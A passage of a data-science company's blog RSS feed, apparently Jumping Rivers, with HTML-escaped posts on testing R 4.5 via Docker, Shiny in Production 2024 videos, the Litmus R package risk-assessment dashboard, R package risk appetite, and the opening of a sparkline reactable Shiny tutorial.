&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once R 4.5 is the released version of R and the &lt;code&gt;r-docker&lt;/code&gt; repository
has been updated, you should use the following command to test out R
4.5.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:4.5-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:4.5-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An alternative way to install multiple versions of R on the same machine
is using &lt;a href="https://github.com/r-lib/rig" rel="external"&gt;&lt;code&gt;rig&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;The R 4.x versions have introduced a wealth of interesting changes.
These have been summarised in our earlier blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r43/" rel="external"&gt;R 4.3.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r44/" rel="external"&gt;R 4.4.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r45/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024 Videos</title><link>https://www.jumpingrivers.com/blog/sip-2024-videos/</link><pubDate>Tue, 08 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2024-videos/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2024-videos/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2024-videos/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
@import url('https://fonts.googleapis.com/css2?family=Besley:ital,wght@0,400..900;1,400..900&amp;display=swap');
select {
width: 100%;
}
[id="video-container"] select {
margin-bottom: 0.5rem;
}
[id="video-container"] .iframe-wrapper {
width: 100%;
border: 1vw solid #28282B;
border-bottom-width: 3vw;
position: relative;
}
[id="video-container"] .iframe-wrapper::before {
content: "SHINY";
font-family: "Besley", serif;
font-weight: bold;
letter-spacing: 2px;
position: absolute;
left: 50%;
bottom: 0%;
font-size: 1.25vw;
transform: translateX(-50%) translateY(2.5vw);
color: silver;
}
[id="video-container"] .iframe-wrapper::after {
content: "";
width: 1vw;
height: 1vw;
position: absolute;
left: 98%;
bottom: 0%;
transform: translateX(-50%) translateY(2vw);
background-color: rgba(255, 0, 0, 0.5);
border-radius: 50%;
}
[id="video-container"] iframe {
width: 100%;
aspect-ratio: 16 / 9;
display: block;
background-color: #28282B;
}
[id="video-container"] .stand {
width: 30%;
height: 3vw;
margin: 0 auto;
background-color: #28282B;
}
&lt;/style&gt;
&lt;script src="https://www.jumpingrivers.com/blog/sip-2024-videos/assets/script.mjs" type="module"&gt;&lt;/script&gt;
&lt;h2 id="2024-videos"&gt;2024 Videos&lt;/h2&gt;
&lt;p&gt;Considering a ticket for Shiny in Production 2025 but unsure what to expect? Maybe you attended in past years but missed out in 2024, or you simply want a refresher on last year’s highlights. Whatever the case, the video player below has you covered!&lt;/p&gt;
&lt;p&gt;Explore six in-depth talks, four lightning talks, and a bonus talk from Shiny in Production 2024&amp;hellip; or binge-watch them all!&lt;/p&gt;
&lt;div id="video-container"&gt;
&lt;select aria-label="Pick a video"&gt;&lt;/select&gt;
&lt;div class="iframe-wrapper"&gt;
&lt;iframe title="Shiny in Production 2024 Video Player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;div class="stand"&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="details-for-2025"&gt;Details for 2025&lt;/h2&gt;
&lt;p&gt;Feeling inspired after watching the videos? Great news—you can join us for Shiny in Production 2025!&lt;/p&gt;
&lt;p&gt;This year&amp;rsquo;s conference takes place on October 8th–9th, and as of now, &lt;strong&gt;early-bird tickets are still available&lt;/strong&gt;. Stay updated on workshops, speakers, and other key details on our dedicated &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025 site&lt;/a&gt;, or &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227" rel="external"&gt;grab your tickets on Eventbrite&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As with the 2024 event, there will also be a satellite R Dev Day starting the afternoon before the conference. Here you can join others making contributions to base R or to infrastructure that supports such contributions. Read organiser Heather Turner&amp;rsquo;s &lt;a href="https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;blog post about the 2024 event&lt;/a&gt; to get an idea of what to expect.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2024-videos/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Visualising R Package Risk Assessments using Litmus</title><link>https://www.jumpingrivers.com/blog/litmus-dashboard/</link><pubDate>Mon, 07 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/litmus-dashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/litmus-dashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/litmus-dashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;A few years ago, we started working with a global pharma company who brought us a particularly thorny challenge. They wanted to use R for FDA submissions—but every package they introduced had to pass through a slow, resource-intensive process to be risk assessed and approved. They&amp;rsquo;re sadly unable to be gung-ho about what R tooling they use, needing instead to be thoughtful and meticulous, considering the statistical rigour, reproducibility, stability and security before including the tools in their production environment. In practice, this meant that it would take up to &lt;strong&gt;two years&lt;/strong&gt; for them to be able to approve a new R package for use. Ouch.&lt;/p&gt;
&lt;p&gt;After performing an audit of their process, we identified a few areas where we could create efficiencies. Our goal: automate everything that could be automated, reducing the manual burden on reviewers while improving consistency and traceability. Development began in earnest last year, and the result is the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse?&lt;/a&gt;, a suite of R packages that allows us to risk assess your R package collection, report on the findings and rescue high-risk packages that are business critical.&lt;/p&gt;
&lt;p&gt;Everything then packaged into one easy to use &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;application&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="does-your-package-pass-the-litmus-test"&gt;Does your package pass the {litmus} test?&lt;/h2&gt;
&lt;p&gt;What is the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt;? {litmus} grabs your R package metadata and generates valuable quality insights. {litmus.score} transforms these outputs into targeted quality scores—code, documentation, popularity, maintenance—plus an overall package rating. {litmus.report} delivers this intelligence in PDFs for permanent records. {litmus.dashboard} offers a comprehensive overview, empowering R library managers with better decision-making tools and streamlined record-keeping.&lt;/p&gt;
&lt;p&gt;Our approach is agnostic regarding the package source - it doesn’t matter if your package is hosted on CRAN, BioConductor or an internal repository. We can risk assess and remediate it all the same. You can read more about our approach to risk assessment in a recent &lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Our aim is to help clients curate a risk-assessed collection of packages, to continue driving innovation using R. Keep an eye out for upcoming blogposts outlining the details of our approach. In the meantime…&lt;/p&gt;
&lt;h2 id="give-our-dashboard-a-spin"&gt;Give our dashboard a spin!&lt;/h2&gt;
&lt;p&gt;We have prepared a &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Shiny app&lt;/a&gt; that allows you to interact with a collection of packages that we have assessed and scored, using {litmus} tools and our new scoring strategy. We’ll be publishing more details about our approach to scoring in the coming weeks.
In the &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;app&lt;/a&gt;, you will be able to assess the high-level qualities of a package collection, including the distribution of scores:&lt;/p&gt;
&lt;img src="overview.png" alt="Litmus dashboard showing distribution of overall package scores" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you click on &amp;lsquo;Package List&amp;rsquo; you&amp;rsquo;ll be able to see the collection&amp;rsquo;s metrics in a detailed, sortable table:&lt;/p&gt;
&lt;img src="table.png" alt="Table containing all metrics for package collection" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you click on an individual row in this table, it will take you through to a detailed breakdown for the individual package, providing an overview of its score within the collection:&lt;/p&gt;
&lt;img src="pkg-view.png" alt="overview of a single package" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;You can also drill down into a visual representation of each feature within the context of the collection of packages:&lt;/p&gt;
&lt;img src="metric-view.png" alt="overview of a package's metrics in detail" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="ready-to-put-your-packages-to-the-test"&gt;Ready to put your packages to the test?&lt;/h2&gt;
&lt;p&gt;The free version of our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;app&lt;/a&gt; allows you to view a subset of CRAN packages. If you are keen to unlock the full potential of Litmus, i.e. customise the package list that is displayed, include your own internally developed packages or non-CRAN packages, record decisions about including a package in your environment, retrieve PDF reports for long-term storage, and remediate business critical packages, we&amp;rsquo;re ready to help.&lt;/p&gt;
&lt;p&gt;Get in touch with us to discuss how we can help you curate a robust R ecosystem using the Litmusverse. As official Posit partners, we are also at the ready to assist you with setting up your ideal R Development environment. For more information about our other Data Science and Data Engineering services, please visit the &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To find out more about how we can facilitate your organisation’s adoption of open-source, please contact us.
&lt;a href="https://www.jumpingrivers.com/contact" class="buttony-link" data-subject="Litmus"&gt;&lt;span&gt;Contact Us&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/litmus-dashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I Use Your R Package?</title><link>https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/</link><pubDate>Mon, 31 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The answer to this simple, innocuous question is: &lt;strong&gt;it depends.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It depends on the package in question, of course. Perhaps less obviously, but just as importantly, it depends on who&amp;rsquo;s asking the question.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re sure if we asked you about &amp;ldquo;package quality&amp;rdquo;, we would all come up with what makes a good package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Documentation&lt;/li&gt;
&lt;li&gt;Unit tests&lt;/li&gt;
&lt;li&gt;Author credibility&lt;/li&gt;
&lt;li&gt;Does the package have a web page?&lt;/li&gt;
&lt;li&gt;Security vulnerabilities&lt;/li&gt;
&lt;li&gt;Bug closure rate&lt;/li&gt;
&lt;li&gt;Are there multiple maintainers?&lt;/li&gt;
&lt;li&gt;Does the package have any reverse dependencies?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We could (and have) come up with another twenty of these attributes. With 95% confidence, we&amp;rsquo;re sure that most people would agree that everything we&amp;rsquo;ve thought of is important. But with 100% confidence, we are certain we would disagree on how substantial these characteristics are. Surely, unit testing is more important than the popularity of the package? But how important is the documentation quality relative to the number of maintainers?&lt;/p&gt;
&lt;p&gt;It all depends on why we are asking. It&amp;rsquo;s all about your risk appetite.&lt;/p&gt;
&lt;h2 id="what-is-risk-appetite"&gt;What is Risk Appetite?&lt;/h2&gt;
&lt;p&gt;Risk appetite is all about the risks you are and aren&amp;rsquo;t willing to take. It ranges from &amp;ldquo;Our packages need to be vaguely sensible, not compromise our system and have a place where I can log bugs&amp;rdquo; to &amp;ldquo;if our packages aren&amp;rsquo;t thoroughly tested and proven to be fit for purpose, I can&amp;rsquo;t use them in production&amp;rdquo;. The former is fairly easy to report on, whereas the latter is quite a bit more complicated.&lt;/p&gt;
&lt;img src="risk-appetite.png" alt="R users risk appetite from least to most risk averse" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="the-risk-seekers"&gt;The Risk Seekers!&lt;/h2&gt;
&lt;p&gt;Who amongst us wouldn&amp;rsquo;t want a top-quality R package? Who are the risk seekers? Most of us, at some point or another. If you are experimenting with building Shiny applications, as long as the package is &amp;ldquo;secure&amp;rdquo;, any old package is fine - you just want to experiment. Likewise, if you are an academic and you want to compare your method to one already published, as long the package is &amp;ldquo;correct&amp;rdquo;, that&amp;rsquo;s good enough.&lt;/p&gt;
&lt;p&gt;During our training courses, we are often asked this question about quality. How bad can a package be to be usable? A thought experiment we like to do is &amp;ldquo;suppose you had an R package, with only one version. It&amp;rsquo;s never updated, no one has heard from the maintainer in ten years. But it provides code for an algorithm you want to use. What would you do?&amp;rdquo; The obvious answer for those who have a high risk appetite is &amp;ldquo;something is better than nothing&amp;rdquo; and &amp;ldquo;proceed with caution&amp;rdquo;.&lt;/p&gt;
&lt;h2 id="risk-averse"&gt;Risk Averse&lt;/h2&gt;
&lt;p&gt;There are lots of examples of where we are (and should be) risk-averse when it comes to R packages. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In the pharmaceutical industry, we need reassurance that the statistics used in reporting are correct. It&amp;rsquo;s vital that these packages are highly regulated!&lt;/li&gt;
&lt;li&gt;Accuracy and stability are crucial for official Government reports on the state of the economy. A minor bug could have significant consequences.&lt;/li&gt;
&lt;li&gt;Banks also work in a regulated environment, running complex models, so have to be careful about the accuracy of their data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Another crucial aspect is that not only do they need to consider what packages they are using, but also demonstrate this thinking in an auditable manner. This is not dissimilar from the ISO 9001 process. In the context of the Pharmaceutical industry, the holy grail is using R packages in FDA submissions for new therapies.&lt;/p&gt;
&lt;h2 id="the-r-validation-hub-is-paving-the-way"&gt;The R Validation Hub is Paving the Way&lt;/h2&gt;
&lt;p&gt;The pharmaceutical industry is the first to address these requirements in a meaningful way. The R Validation Hub put out a &lt;a href="https://www.pharmar.org/white-paper/" rel="external"&gt;white paper&lt;/a&gt; which addresses the use of R and its packages for statistical analysis in pharmaceutical regulatory submissions, proposing a risk-based approach for validating R packages within validated infrastructure. The paper suggests that base R packages present minimal risk, whilst contributed packages require risk assessment based on their purpose, maintenance practices, community usage, and testing protocols.&lt;/p&gt;
&lt;p&gt;The proposed framework classifies packages as either &amp;ldquo;Intended for Use&amp;rdquo; (loaded directly by users) or &amp;ldquo;Imports&amp;rdquo; (supporting dependencies), focusing validation efforts primarily on the former. Risk assessment should evaluate whether packages are statistical or non-statistical in nature, examine development practices, consider community adoption metrics, and review testing coverage. Organisations can use this assessment to determine package inclusion in validated systems and identify additional testing requirements, with high-risk packages needing more rigorous validation.&lt;/p&gt;
&lt;p&gt;The approach required for those not working in regulated industries will probably not be as serious as this, but this gives an idea of what the gold standard for R package validation should be, which we can draw inspiration from for less strict applications. They&amp;rsquo;ve also created some helpful tools, like {riskmetric} which allows us to pull metadata about packages, and create quality scores for these data.&lt;/p&gt;
&lt;h2 id="how-do-we-enable-risk-assessment-for-everyone-across-the-risk-spectrum"&gt;How Do We Enable Risk Assessment for Everyone Across the Risk Spectrum?&lt;/h2&gt;
&lt;p&gt;This is the question we have been grappling with over the past few months. How do we gather all of the information required to make informed decisions about including packages in production environments, using a flexible framework that meets the needs of everyone on the risk appetite spectrum? Especially considering…&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;There are so many packages on CRAN!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is both a blessing and a curse, as anyone who&amp;rsquo;s ever worked in a regulated environment can tell you. The obvious answer is to automate, automate, automate! This is exactly what we&amp;rsquo;ve done in the creation of the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt; package validation framework.&lt;/p&gt;
&lt;p&gt;Our process relies on automation wherever possible:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We have written code based on {riskmetric} that pulls package metadata from CRAN, git repositories and Posit Package Manager to provide a comprehensive overview of the package&amp;rsquo;s qualities&lt;/li&gt;
&lt;li&gt;We have created a framework to analyse and score packages based on these data&lt;/li&gt;
&lt;li&gt;We have created reporting and dashboarding workflows that allow us to generate package- and collection-level overviews of the scores for each package&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve implemented automatic acceptance/rejection of a package based on client-specified criteria&lt;/li&gt;
&lt;li&gt;Our process also enables automated reporting of any additional manual steps taken to save a package from the bin, for example writing additional remedial tests or documentation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Keep an eye out for future blogs on this topic, as we dive a little deeper into the underlying principles driving our approach to package validation.&lt;/p&gt;
&lt;h2 id="does-your-package-pass-the-litmus-test"&gt;Does Your Package Pass the Litmus Test?&lt;/h2&gt;
&lt;p&gt;Ready to find out how we can help you validate your R package collection? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;Get in touch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparklines in Reactable Tables in Shiny Apps</title><link>https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/</link><pubDate>Thu, 27 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the third blog in a series about the {sparkline} R package for
inline data visualisations. You can read the first one about getting
started with the package
&lt;a href="https://www.jumpingrivers.com/blog/sparkline/" rel="external"&gt;here&lt;/a&gt; and the second one
about embedding them in HTML tables with the {reactable} package
&lt;a href="https://www.jumpingrivers.com/blog/sparkline-reactable/" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In this blog I am taking it a step further and demonstrating how to use
our sparkline reactable table in a &lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny app.&lt;/a&gt;
Thankfully {reactable} has some helpful functions that make this super
easy! I will also look at using a dynamic traffic light image in a
reactable table at the end.&lt;/p&gt;
&lt;h2 id="reactable-sparkline-table"&gt;Reactable Sparkline Table&lt;/h2&gt;
&lt;p&gt;I’m going to start where we ended the last blog. The following code
creates a {reactable} table using the iris data with a few {sparkline}
visualisations in the columns.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;iframe title="My embedded document" width="100%" height="230" src="https://www.jumpingrivers.com/misc/reactable-sparkline/html_files/table1.html" alt="reactable table displaying sparkline boxplots and line &amp;amp; bar charts" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-shiny-reactable"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="using-sparklines-in-a-shiny-app"&gt;Using sparklines in a Shiny App&lt;/h2&gt;
&lt;p&gt;This is actually made very easy by two {reactable} functions which
follow the traditional &lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny&lt;/a&gt; naming. In our
server we’ll need to use &lt;code&gt;renderReactable&lt;/code&gt; (which uses
&lt;code&gt;htmlwidgets::shinyRenderWidget&lt;/code&gt; under the hood), to create our table in
the server. Then in the UI we’ll use &lt;code&gt;reactableOutput&lt;/code&gt; (which uses
&lt;code&gt;htmlwidgets::shinyWidgetOutput&lt;/code&gt;) to call our table in the app UI.&lt;/p&gt;
&lt;p&gt;To demonstrate this I am using a basic shiny app with a sparkline bullet
chart in a reactable table then a screenshot of the result.&lt;/p&gt;
